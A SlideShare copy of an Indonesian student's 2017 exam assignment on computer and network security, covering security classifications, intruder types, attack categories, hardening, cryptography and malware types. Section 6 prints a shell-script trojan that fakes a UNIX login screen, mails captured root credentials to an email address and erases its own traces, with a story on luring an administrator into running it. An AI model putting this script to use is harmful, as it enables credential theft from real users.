SlideShare a Scribd company logo
1 of 13
Download to read offline
Tugas UAS Mata Kuliah
ADMISTRASI DAN KEAMANAN JARINGAN KOMPUTER
Oleh
Sriwahyuni W
1501047
PROGRAM STUDI TEKNIK KOMPUTER
POLITEKNIK ACEH SELATAN
2017
1) Menurut David Icove [John D. Howard, “An Analysis Of Security Incidents On The
Internet 1989 - 1995,” PhD thesis, Engineering and Public Policy, Carnegie Mellon
University, 1997.] berdasarkan lubang keamanan, keamanan dapat diklasifikasikan menjadi
empat, yaitu:
1. Keamanan yang bersifat fisik (physical security): termasuk akses orang ke gedung,
peralatan, dan media yang digunakan. Contoh :
 Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer
yang digunakan juga dapat dimasukkan ke dalam kelas ini.
 Denial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri
saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang
diutamakan adalah banyaknya jumlah pesan).
 Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan
sehingga dia menjadi ter-lalu sibuk dan bahkan dapat berakibat macetnya sistem
(hang).
2. Keamanan yang berhubungan dengan orang (personel), Contoh :
 Identifikasi user (username dan password)
 Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola).
3. Keamanan dari data dan media serta teknik komunikasi (communications).
4. Keamanan dalam operasi: Adanya prosedur yang digunakan untuk mengatur dan
mengelola sistem keamanan, dan juga ter-masuk prosedur setelah serangan (post
attack recovery).
[Sumber Referensi Internet :
komang_anom.staff.gunadarma.ac.id/Downloads/.../Pertemuan6.pdf]
2) Karakteristik Penyusup :
a. The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan
jenis sistem dan data yang anda miliki.
b. The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda,
atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali
pulih.
c. The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha
menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin
menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya.
d. The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki
dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki
sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya.
[Sumber Referensi : maimunah.ilearning.me/wp-content/.../5/.../pertemuan1.doc.docx]
4) ASPEK KEAMANAN KOMPUTER :
Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privacy,” O’Reilly & Associates,
Inc, 1995. ]
1. Privacy / Confidentiality
 Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.
 Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai
(user) tidak boleh dibaca oleh administrator.
 Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk
keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut.
 Contoh : data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social
security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu
kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.
 Bentuk Serangan : usaha penyadapan (dengan program sniffer).
 Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan confidentiality
adalah dengan menggunakan teknologi kriptografi.
2. Integrity
 Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
 Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke
alamat yang dituju.
 Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain yang mengubah
informasi tanpa izin, “man in the middle attack” dimana seseorang menempatkan diri di
tengah pembicaraan dan menyamar sebagai orang lain.
3. Authentication
 Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang
mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud.
 Dukungan :
 Adanya Tools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi
watermarking(untuk menjaga “intellectual property”, yaitu dengan menandai
dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan digital signature.
 Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses
informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan
sejenisnya.
4. Availability
 Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.
 Contoh hambatan :
 “denial of service attack” (DoS attack), dimana server dikirimi permintaan (biasanya
palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat
melayani permintaan lain atau bahkan sampai down, hang, crash.
 mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e-
mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e-
mailnya atau kesulitan mengakses e-mailnya.
5. Access Control
 Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah
authentication dan juga privacy
 Metode : menggunakan kombinasi userid/password atau dengan menggunakan mekanisme
lain.
6. Non-repudiation
Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan
sebuah transaksi. Dukungan bagi electronic commerce.
Sumber Referensi : elib.unikom.ac.id/download.php?id=105225
5) Menurut W. Stallings [William Stallings, “Network and Internetwork Security,”
Prentice
Hall, 1995.] serangan (attack) terdiri dari :
 Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan
kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service
attack”.
 Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi.
Contoh dari serangan ini adalah penyadapan (wiretapping).
 Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi
dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah
mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.
 Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem.
Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu
ke dalam jaringan komputer.
[Sumber Referensi E-book, Budi Raharjo.Keamanan Sistem Informasi Berbasis Internet,
Hal 13.1999]
6) MEMAHAMI HACKER BEKERJA
Secara umum melalui tahapan-tahapan sebagai berikut :
 Tahap mencari tahu system komputer sasaran.
 Tahap penyusupan
 Tahap penjelajahan
 Tahap keluar dan menghilangkan jejak.
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki
potensi memancing pengelola sistem komputer (administrator pemegang account root . . .
hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX
yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja
dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat
kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit
peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan
oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum
pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release
bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program
kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem
UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: c"
read LOGIN
stty echo
echo "password: c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal
penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut
menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login
ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk
login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah)
salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login
dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi
password pada layar di atas, setelah itu maka otomatis data login dan password tersebut
akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit
telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki
beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker
yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di
atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula
ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga
menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam
sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis
peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini
dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar
pemilik root menjalankan program ini.
[Sumber Referensi : fitrimarisa.widyagama.ac.id/wp.../09/keamanan2-HACKER2.doc]
7) Prinsip dasar Perancangan Sistem
1. Mencegah hilangnya data
2. Mencegah masuknya penyusup
LAPISAN KEAMANAN :
1. Lapisan Fisik :
 membatasi akses fisik ke mesin :
o Akses masuk ke ruangan komputer
o penguncian komputer secara hardware
o keamanan BIOS
o keamanan Bootloader
 back-up data :
o pemilihan piranti back-up
o penjadwalan back-up
 mendeteksi gangguan fisik :
 log file : Log pendek atau tidak lengkap, Log yang berisikan waktu yang aneh, Log
dengan permisi atau kepemilikan yang tidak tepat, Catatan pelayanan reboot atau
restart, Log yang hilang, masukan su atau login dari tempat yang janggal
 mengontrol akses sumber daya.
2. Keamanan lokal
Berkaitan dengan user dan hak-haknya :
 Beri mereka fasilitas minimal yang diperlukan.
 Hati-hati terhadap saat/dari mana mereka login, atau tempat seharusnya mereka
login.
 Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.
3. Keamanan Root
 Ketika melakukan perintah yang kompleks, cobalah dalam cara yang tidak merusak
dulu, terutama perintah yang menggunakan globbing: contoh, anda ingin melakukan
"rm foo*.bak", pertama coba dulu: "ls foo*.bak" dan pastikan anda ingin menghapus
file-file yang anda pikirkan.
 Beberapa orang merasa terbantu ketika melakukan "touch /-i" pada sistem mereka.
Hal ini akan membuat perintah-perintah seperti : "rm -fr *" menanyakan apakah anda
benar-benar ingin menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan
memberlakukannya sebagai option -i ke rm).
 Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika anda berusaha
mengetahui bagaimana melakukan sesuatu, kembali ke shell pemakai normal hingga
anda yakin apa yang perlu dilakukan oleh root.
 Jalur perintah untuk pemakai root sangat penting. Jalur perintah, atau variabel
lingkungan PATH mendefinisikan lokal yang dicari shell untuk program. Cobalah dan
batasi jalur perintah bagi pemakai root sedapat mungkin, dan jangan pernah
menggunakan '.', yang berarti 'direktori saat ini', dalam pernyataan PATH anda.
Sebagai tambahan, jangan pernah menaruh direktori yang dapat ditulis pada jalur
pencarian anda, karena hal ini memungkinkan penyerang memodifikasi atau menaruh
file biner dalam jalur pencarian anda, yang memungkinkan mereka menjadi root
ketika anda menjalankan perintah tersebut.
 Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec (disebut utilitas
r) sebagai root. Mereka menjadi sasaran banyak serangan, dan sangat berbahaya bila
dijalankan sebagai root. Jangan membuat file .rhosts untuk root.
 File /etc/securetty berisikan daftar terminal-terminal tempat root dapat login.
Secara baku (pada RedHat Linux) diset hanya pada konsol virtual lokal (vty).
Berhati-hatilah saat menambahkan yang lain ke file ini. Anda seharusnya login dari
jarak jauh sebagai pemakai biasa dan kemudian 'su' jika anda butuh (mudah-mudahan
melalui ssh atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara
langsung sebagai root.
 Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan anda dapat
mempengaruhi banyak hal. Pikir sebelum anda mengetik!
4. Keamanan File dan system file
 Directory home user tidak boleh mengakses perintah mengubah system seperti
partisi, perubahan device dan lain-lain.
 Lakukan setting limit system file.
 Atur akses dan permission file : read, writa, execute bagi user maupun group.
 Selalu cek program-program yang tidak dikenal
5. Keamanan Password dan Enkripsi
 Hati-hati terhadap bruto force attack dengan membuat password yang baik.
 Selalu mengenkripsi file yang dipertukarkan.
 Lakukan pengamanan pada level tampilan, seperti screen saver.
6. Keamanan Kernel
 selalu update kernel system operasi.
 Ikuti review bugs dan kekurang-kekurangan pada system operasi.
7. Keamanan Jaringan
 Waspadai paket sniffer yang sering menyadap port Ethernet.
 Lakukan prosedur untuk mengecek integritas data
 Verifikasi informasi DNS
 Lindungi network file system
 Gunakan firewall untuk barrier antara jaringan privat dengan jaringan eksternal
[sumber referensi : dhian_sweetania.staff.gunadarma.ac.id/.../Pendahuluan-
Keamanan-..]
8) Kriptografi
DEFENISI
Cryptography adalah suatu ilmu ataupun seni mengamankan pesan, dan dilakukan oleh
cryptographer.
Cryptanalysis adalah suatu ilmu dan seni membuka (breaking) ciphertext dan orang yang
melakukannya disebut cryptanalyst.
ELEMEN
CRYPTOSYSTEM
Cryptographic system atau cryptosystem adalah suatu fasilitas untuk mengkonversikan
plaintext ke ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang
menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses enkripsi
dan dekripsi diatur oleh satu atau beberapa kunci kriptografi.
[sumber referensi Buku Kriptografi Rinaldi Munir, Penerbit informatika Bandung.]
9) Metode Enkripsi
Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut
tidak dapat dibaca tanpa bantuan pengetahuan khusus. Dikarenakan enkripsi telah
digunakan untuk mengamankan komunikasi di berbagai negara, hanya organisasi-organisasi
tertentu dan individu yang memiliki kepentingan yang sangat mendesak akan kerahasiaan
yang menggunakan enkripsi. Di pertengahan tahun 1970-an, enkripsi kuat dimanfaatkan
untuk pengamanan oleh sekretariat agen pemerintah Amerika Serikat pada domain publik,
dan saat ini enkripsi telah digunakan pada sistem secara luas, seperti Internet e-
commerce, jaringan Telepon bergerak dan ATM pada bank.
Enkripsi dapat digunakan untuk tujuan keamanan, tetapi teknik lain masih diperlukan untuk
membuat komunikasi yang aman, terutama untuk memastikan integritas dan autentikasi dari
sebuah pesan. Contohnya, Message Authentication Code (MAC) atau digital signature.
Penggunaan yang lain yaitu untuk melindungi dari analisis jaringan komputer.
Dekripsi adalah proses mentranslasikan informasi yang diterima dengan pengetahuan
khusus dari sumber. Metode Enkripsi:
 Metode Enkripsi MD2
Message-Digest algortihm 2 (MD2) adalah fungsi hash cryptographic yang
dikembangkan oleh Ronald Rivest pada tahun 1989.
Algoritma dioptimalkan untuk komputer 8-bit. MD2 yang ditetapkan dalam RFC 1319.
Meskipun algoritma lainnya telah diusulkan sejak dulu, seperti MD4, MD5 dan SHA,
bahkan sampai dengan 2004 [update] MD2 tetap digunakan dalam infrastruktur
kunci publik sebagai bagian dari sertifikat yang dihasilkan dengan MD2 dan RSA.
 Metode Enkripsi MD4
Message-Digest algortihm 4(seri ke-4) yang dirancang oleh Profesor Ronald Rivest
dari MIT pada tahun 1990.
Panjangnya adalah 128 bit.
MD4 juga digunakan untuk menghitung NT-hash ringkasan password pada Microsoft
Windows NT, XP dan Vista.
 Metode Enkripsi MD5
MD5 adalah salah satu dari serangkaian algortima message digest yang didesain oleh
Profesor Ronald Rivest dari MIT (Rivest, 1994).
Saat kerja analitik menunjukkan bahwa pendahulu MD5 yaitu MD4 mulai tidak aman,
MD5 kemudian didesain pada tahun 1991 sebagai pengganti dari MD4 (kelemahan
MD4 ditemukan oleh Hans Dobbertin). Dalam kriptografi, MD5 (Message-Digest
algortihm 5) ialah fungsi hash kriptografik yang digunakan secara luas dengan hash
value 128-bit.
Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-
macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan
pengujian integritas sebuah file.
 Metode Enkripsi SHA
SHA adalah serangkaian fungsi cryptographic hash yang dirancang oleh National
Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information
Processing Standard.
SHA adalah Secure Hash Algoritma. Jenis-jenis SHA yaitu SHA-0, SHA-1, dan
SHA-2.
Untuk SHA-2 menggunakan algoritma yang identik dengan ringkasan ukuran variabel
yang terkenal sebagai SHA-224, SHA-256, SHA-384, dan SHA-512.
 Metode Enkripsi RC4
RC4 merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data
pada satu saat. Unit atau data pada umumnya sebuah byte atau bahkan kadang
kadang bit (byte dalam hal RC4).
Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang
variabel.
RC4 adalah penyandian stream cipher yang dibuat oleh Ron Riverst pada tahun 1987
untuk pengamanan RSA.
Algoritmanya didasarkan pada permutasi acak.
 Metode Enkripsi Base64
Base64 adalah sistem untuk mewakili data mentah byte sebagai karakter ASCII.
Base64 menyediakan 6-bit encoding 8-bit ASCII karakter.
Base64 merupakan format yang dicetak menggunakan karakter, memungkinkan binari
data yang akan dikirim dalam bentuk dan email, dan akan disimpan di database atau
file.
[sumber referensi : http://safirmas.web.ugm.ac.id/2016/10/23/metode-enkripsi-dan-dekripsi/]
10) KLASIFIKASI Devil Program
Taksonomi ancaman perangkat lunak / klasifikasi program jahat (malicious program):
a) Program-program yang memerlukan program inang (host program). Fragmen
program tidak dapat mandiri secara independen dari suatu program aplikasi,
program utilitas atau program sistem.
b) Program-program yang tidak memerlukan program inang. Program sendiri
yang dapat dijadwalkan dan dijalankan oleh sistem operasi.
Tipe-tipe program jahat :
a) Bacteria : program yang mengkonsumsi sumber daya sistem dengan mereplikasi
dirinya sendiri. Bacteria tidak secara eksplisit merusak file. Tujuan program ini
hanya satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya
mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming atau
menciptakan dua file baru, masing-masing adalah kopian file program bacteria. Kedua
kopian in kemudian mengkopi dua kali, dan seterusnya
b) Logic bomb : logik yang ditempelkan pada program komputer agar memeriksa suatu
kumpulan kondisi di sistem. Ketika kondisi-kondisi yang dimaksud ditemui, logik
mengeksekusi suatu fungsi yang menghasilkan aksi-aksi tak diotorisasi.
c) Trapdoor : Titik masuk tak terdokumentasi rahasia di satu program untuk
memberikan akses tanpa metode-metode otentifikasi normal
d) Trojan horse : Rutin tak terdokumentasi rahasia ditempelkan dalam satu program
berguna. Program yang berguna mengandung kode tersembunyi yang ketika
dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program
menyebabkan eksekusi rutin rahasia ini.
e) Virus : Kode yang ditempelkan dalam satu program yang menyebabkan pengkopian
dirinya disisipkan ke satu program lain atau lebih, dengan cara memodifikasi
program-program itu.
f) Worm : Program yang dapat mereplikasi dirinya dan mengirim kopian-kopian dari
komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk
mereplikasi dan progasai kembali. Selain hanya propagasi, worm biasanya melakukan
fungsi yang tak diinginkan.
[sumber referensi : reza_chan.staff.gunadarma.ac.id/.../P3+-+Ancaman+Sistem+Keama.]
11) Keamanan Sistem Operasi
Tujuan Sistem Operasi: mengontrol akses share dan mengimplementasikan interface
untuk membeolehkan akses tersebut. Selain tujuan itu adalah dukungan aktifitas-
aktifitas seperti identifikasi dan authentication, naming, penyimpanan objek,
penjadwalan, komunikasi antar proses, dan reclaiming serta reusing suatu objek.
Fungsi-fungsi sistem operasi dikategorikan menjadi:
 Kontrol akses
 Manajemen identitas dan kepercayaan (credential)
 Alir informasi
 Perlindungan audit dan integritas
Beberapa aspek system computer yang membutuhkan perlindungan :
 Memory
 Peralatan I/O yang dapat dibagi pakai misalnya Disk
 Peralatan I/O serial seperti printer dan drive tape
 Program yang dapat dibagi pakai dan subprosedur
 Jaringan
 Data yang dibagi(share)
[Sumber referensi: aldi_tob_2000.staff.gunadarma.ac.id/.../Materi+Keamanan+Kompu..]
12) Skema Chmode
Chmod merupakan sebuah perintah yang digunakan untuk menambah (+) dan mengurangi (-)
ijin pemakai untuk mengakses file atau direktori.
Misalkan kita memiliki file sebagai berikut jika dilihat dengan perintah ls -l
-rwxrw-r-- 1 iqbal pembega 68 Sep 28 01:39 ini-file.txt
Keterangan: -rwxrw-r-- 1 iqbal pembega 68 Sep 28 01:39 ini-file.txt
- karakter pertama “-” yang menjelaskan bahwa ini ada sebuah file, jika di
mulai dengan “d” maka ini adalah direktori/folder.
rwx 3 karakter berikutnya, hak akses user yang memiliki file ini, dimana pada
kasus ini pemilik file mendapatkan hak untuk read, write dan execute.
rw- 3 karakter berikutnya, hak akses suatu group pada file ini, dimana pada
kasus ini group mendapatkan hak untuk read dan write tanpa execute.
r-- 3 karakter berikutnya, hak akses untuk "others" (user lainnya). “Others”
hanya bisa membaca file ini.
1 jumlah sortcut / link yang menuju ke file ini.
iqbal nama pemilik file ini.
pembega group yang memiliki file ini.
68 ukuran file dalam blok.
Sep 28 01:39 waktu yang menunjukan kapan file ini di buat / dimodifikasi.
ini-file.txt nama file.
[sumber referensi : http://pembega.blogspot.co.id/2014/10/perintah-chown-chgrp-dan-chmod-di-
linux.html]

More Related Content

What's hot

Cara wildan hack akun sby
Cara wildan hack akun sbyCara wildan hack akun sby
Cara wildan hack akun sbyIzhar HS
 
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...Nurfanida Hikmalia
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4rian75
 
Pengertian keamanan komputer
Pengertian keamanan komputerPengertian keamanan komputer
Pengertian keamanan komputerBudi Prasetyo
 
Perkembangan cybercrime dan jenis
Perkembangan cybercrime dan jenisPerkembangan cybercrime dan jenis
Perkembangan cybercrime dan jenisAgri Prayogi
 
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...Vhiie Audi
 
Cybercrime
CybercrimeCybercrime
Cybercrimeaw222
 
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...Afifah Luthfiah
 
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...febyratnasari
 
Makalah tentang keamanan komputer
Makalah tentang keamanan komputerMakalah tentang keamanan komputer
Makalah tentang keamanan komputer082393805433
 

What's hot (19)

ISS GSLC-3
ISS GSLC-3ISS GSLC-3
ISS GSLC-3
 
Materi ke-11-cybercrime-nin2
Materi ke-11-cybercrime-nin2Materi ke-11-cybercrime-nin2
Materi ke-11-cybercrime-nin2
 
Cara wildan hack akun sby
Cara wildan hack akun sbyCara wildan hack akun sby
Cara wildan hack akun sby
 
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...
Sim, nurfanida putri hikmalia, hapzi ali,information security,universitas mer...
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4
 
Hacker
HackerHacker
Hacker
 
Tugas kkm
Tugas kkmTugas kkm
Tugas kkm
 
Pengertian keamanan komputer
Pengertian keamanan komputerPengertian keamanan komputer
Pengertian keamanan komputer
 
Makalah keamanan jaringan
Makalah keamanan jaringanMakalah keamanan jaringan
Makalah keamanan jaringan
 
Perkembangan cybercrime dan jenis
Perkembangan cybercrime dan jenisPerkembangan cybercrime dan jenis
Perkembangan cybercrime dan jenis
 
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...
2, SI & PI Yovie Aulia Dinanda, Hapzi Ali, Definisi dan Jenis Penyerangan dan...
 
Cybercrime
CybercrimeCybercrime
Cybercrime
 
Cybercrime
CybercrimeCybercrime
Cybercrime
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
SIM 10, Afifah Luthfiah, Hapzi Ali, Keamanan Sistem Informasi, Univ. Mercu Bu...
 
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
Sim, feby ratna sari, hapzi ali, keamanan sistem informasi , universitas merc...
 
Hacker & Cracker
Hacker & Cracker Hacker & Cracker
Hacker & Cracker
 
Makalah tentang keamanan komputer
Makalah tentang keamanan komputerMakalah tentang keamanan komputer
Makalah tentang keamanan komputer
 
8. computer threats
8. computer threats8. computer threats
8. computer threats
 

Similar to Sriwahyuni w 1501047 uas_keamananjarkom

552-P01 [Compatibility Mode].pdf
552-P01 [Compatibility Mode].pdf552-P01 [Compatibility Mode].pdf
552-P01 [Compatibility Mode].pdfFadlyBandit
 
Modul 1 - Pendahuluan Keamanan Jaringan Komputer
Modul 1 - Pendahuluan Keamanan Jaringan KomputerModul 1 - Pendahuluan Keamanan Jaringan Komputer
Modul 1 - Pendahuluan Keamanan Jaringan Komputerjagoanilmu
 
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...Dwi Yuliyanah
 
Sistem keamanan komputer
Sistem keamanan komputerSistem keamanan komputer
Sistem keamanan komputercondro23
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4rian75
 
Presentasi modul 12 keamanan komputer
Presentasi modul 12 keamanan komputerPresentasi modul 12 keamanan komputer
Presentasi modul 12 keamanan komputerParis Dkc
 
Materi 7-keamanan-komputer-dampak-etika-penanggulangan
Materi 7-keamanan-komputer-dampak-etika-penanggulanganMateri 7-keamanan-komputer-dampak-etika-penanggulangan
Materi 7-keamanan-komputer-dampak-etika-penanggulanganAhmad Rifail
 
Aspek-Aspek Keamanan Jaringan
Aspek-Aspek Keamanan JaringanAspek-Aspek Keamanan Jaringan
Aspek-Aspek Keamanan JaringanFanny Oktaviarti
 
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...Abud Maha
 
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...Gusti_Ketut_Suardika
 
6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...
6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...
